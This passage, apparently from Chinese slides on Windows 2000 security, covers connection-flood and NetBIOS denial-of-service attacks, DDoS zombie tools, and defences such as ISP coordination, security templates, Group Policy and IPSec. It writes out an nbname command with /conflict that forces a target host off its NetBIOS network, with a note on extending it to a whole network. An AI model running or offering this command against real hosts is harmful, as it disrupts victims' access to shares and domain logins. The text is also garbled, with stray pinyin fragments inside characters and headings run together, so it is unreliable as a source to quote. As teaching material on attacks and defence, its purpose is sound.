éi)攻擊更為先進(jìn)，因?yàn)樗鼘?shí)際上完成了3次握手過(guò)程，使目標(biāo)計(jì)算機(jī)上的所有套接字都處于ESTABLISHED狀態(tài)。最終，所有的套接字都被耗盡，目標(biāo)就不能再接受任何新的連接，而不管它還具有多少可用的內(nèi)存、帶寬、CPU時(shí)間等TCP連接淹沒(méi)應(yīng)用程序服務(wù)級(jí)DoS攻擊IIS的WebDAVtelnet服務(wù)器基于LAN的DoS攻擊在面向LAN的Windows2000DoS攻擊中，大多數(shù)都與NetBIOS有關(guān)。NetBIOS的傳統(tǒng)問(wèn)題是它依賴(lài)于不可靠的、無(wú)認(rèn)證的服務(wù)。它提供了一種IP地址與NetBIOS名稱(chēng)間相互映射的方法，很容易被偽裝，因此任何可以連接到本地網(wǎng)絡(luò)中的人都可以通過(guò)聲稱(chēng)已經(jīng)注冊(cè)了其他合法客戶(hù)端的NetBIOS名稱(chēng)或者向特定的主機(jī)發(fā)送“名稱(chēng)釋放”報(bào)文，從而使合法客戶(hù)端斷開(kāi)網(wǎng)絡(luò)收到這種報(bào)文的客戶(hù)端將會(huì)完全丟失加入NetBIOS網(wǎng)絡(luò)的能力，包括訪(fǎng)問(wèn)文件共享、Windows域認(rèn)證等等基于LAN的DoS攻擊下面是使用nbname對(duì)一臺(tái)主機(jī)進(jìn)行DoS攻擊的例子。在Windows2000上，你必須首先禁用TCP/IP上的NetBIOS，以避免它與真正的NBNS服務(wù)發(fā)生沖突，因?yàn)镹BNS服務(wù)通常會(huì)大量地使用UDP端口137。然后，運(yùn)行nbname(使用你要攻擊的主機(jī)的IP地址代替這里的22)：C:\>nbname/astat22/conflict基于LAN的DoS攻擊其中/ASTAT參數(shù)用于從目標(biāo)獲取遠(yuǎn)程適配器的狀態(tài)，/CONFLICT參數(shù)向響應(yīng)適配器狀態(tài)請(qǐng)求的計(jì)算機(jī)的遠(yuǎn)程名稱(chēng)表格中的全部名稱(chēng)發(fā)送名稱(chēng)釋放報(bào)文通過(guò)使用/QUERY[nameIP]/CONFLICT/DENY[name_or_file]參數(shù)，攻擊者可以對(duì)整個(gè)網(wǎng)絡(luò)進(jìn)行DoS攻擊基于LAN的DoS攻擊在受害主機(jī)上，可能會(huì)出現(xiàn)下列癥狀：網(wǎng)絡(luò)連接時(shí)斷時(shí)續(xù)網(wǎng)絡(luò)鄰居(NetworkNeighborhood)等工具不能正常工作netsend命令不能正常工作受影響的服務(wù)器不能認(rèn)證域登錄不能訪(fǎng)問(wèn)共享資源和基礎(chǔ)的NetBIOS服務(wù)，例如NetBIOS名稱(chēng)解析nbtstat命令會(huì)將NetBIOS名稱(chēng)服務(wù)的狀態(tài)顯示為Conflict(沖突)Windows2000DDoS僵尸在2000年2月之后，“僵尸”(zombie)這個(gè)詞開(kāi)始流行起來(lái)，用以代指那些被用來(lái)攻擊受害者的無(wú)辜的DDoS客戶(hù)端TribeFloodNetwork(TFN)TrinooStacheldrahtTFN2KWinTrinoo防御DoS－聯(lián)合你的ISP聯(lián)系你的Internet服務(wù)供應(yīng)商(ISP)，詢(xún)問(wèn)他們能夠?yàn)榉乐鼓愕倪B接受到DoS攻擊而提供何種措施(如果有)。幾乎所有的Internet連接都要經(jīng)過(guò)ISP，不管你的DoS防御策略是多么牢固，如果ISP的連接斷開(kāi)或是飽和，你的措施就沒(méi)有任何意義防御DoS－聯(lián)合你的ISP在站點(diǎn)受到攻擊時(shí)，你的ISP能夠做出什么反應(yīng)。如果可能的話(huà)，將你的ISP的網(wǎng)絡(luò)操作中心(NOC)的聯(lián)系信息放在手邊記住，跟蹤找到攻擊的發(fā)起者是很困難的，但如果你的ISP肯合作并且能夠訪(fǎng)問(wèn)你和攻擊者之間的路由器，這也是可能實(shí)現(xiàn)的防御DoS－配置邊界路由器防御DoS及時(shí)安裝補(bǔ)丁合理配置TCP/IP參數(shù)合理配置TCP/IP參數(shù)合理配置TCP/IP參數(shù)目錄IIS5的安全終端服務(wù)器安全MicrosoftInternet客戶(hù)端的安全物理攻擊拒絕服務(wù)攻擊安全功能和工具安全模板和安全配置分析組策略IPSecKerberos加密文件系統(tǒng)(EncryptedFileSystem，EFS)RunasWindows文件保護(hù)(WindowsFileProtection，WFP)安全模板、安全配置和分析安全模板(SecurityTemplate)、安全配置和分析(SecurityConfigurationandAnalysis)是在Windows2000環(huán)境中部署安全體系時(shí)所能使用的最能夠節(jié)省時(shí)間的工具，特別是在與組策略聯(lián)合使用時(shí)安全模板是Windows2000中與安全有關(guān)的設(shè)置的結(jié)構(gòu)化列表，通過(guò)點(diǎn)擊鼠標(biāo)就可以編輯和應(yīng)用，而無(wú)需去尋找和配置本書(shū)中已經(jīng)討論過(guò)的大量分散的安全設(shè)置。另外，這些模板文件可以與系統(tǒng)的當(dāng)前設(shè)置進(jìn)行比較，從而顯示出一致和不一致的配置(即分析功能)安全模板、安全配置和分析通過(guò)打開(kāi)一個(gè)空白的Microsoft管理控制臺(tái)(MMC)，然后添加安全模板、安全配置和分析管理單元，就可以使用這兩項(xiàng)工具組策略組策略(GroupPolicy)是Windows2000提供的功能最強(qiáng)大的新工具之一，它的作用已經(jīng)遠(yuǎn)遠(yuǎn)超出了安全設(shè)置的范圍組策略是Windows2000的集中化管理配置管理體系。它是由組策略對(duì)象(GroupPolicyObject，GPO)實(shí)現(xiàn)的，GPO定義了可以被應(yīng)用于(或鏈接到)用戶(hù)和計(jì)算機(jī)的配置參數(shù)。GPO有兩種類(lèi)型：本地GPO(LGPO)和活動(dòng)目錄GPO(ADGPO)組策略L(fǎng)GPO保存在%systemroot%\system32\GroupPolicy目錄中，由以下一些文件組成：gpt.ini，管理模板(.adm)，安全配置文件(.pol)，以及登錄/注銷(xiāo)和啟動(dòng)/關(guān)機(jī)腳本ADGPO存儲(chǔ)在%systemroot%\system32\sysvol\<domain>\Policies目錄中，活動(dòng)目錄中的System|Policy容器中也保存了指向每個(gè)ADGPO的指針LGPO只作用于本地計(jì)算機(jī)。ADGPO則可以應(yīng)用于站點(diǎn)(site)、域(domain)、組織單位(OrganizationalUnit，OU)，而且多個(gè)GPO可以鏈接到同一個(gè)站點(diǎn)、域或OU組策略與安全相關(guān)的GPO設(shè)置集中在ComputerConfiguration\Win-dowsSettings\SecuritySettings結(jié)點(diǎn)之下SecuritySettings(安全策略)結(jié)點(diǎn)定義了賬戶(hù)策略、審核策略、事件日志、公鑰和IPSec策略由于這些參數(shù)可以在站點(diǎn)、域、OU級(jí)別上進(jìn)行設(shè)置，大型網(wǎng)絡(luò)環(huán)境中的安全管理工作的負(fù)擔(dān)就可以減輕很多。更好的是，安全模板可以被導(dǎo)入到一個(gè)GPO中。因此，組策略是安全地配置大型Windows2000域的最佳方法將安全模板導(dǎo)入組策略IPSecIPSec定義了一種用以獲取IP數(shù)據(jù)報(bào)的端到端安全的機(jī)制，包括認(rèn)證、機(jī)密性、完整性和防回放服務(wù)，而且無(wú)需中間設(shè)備來(lái)理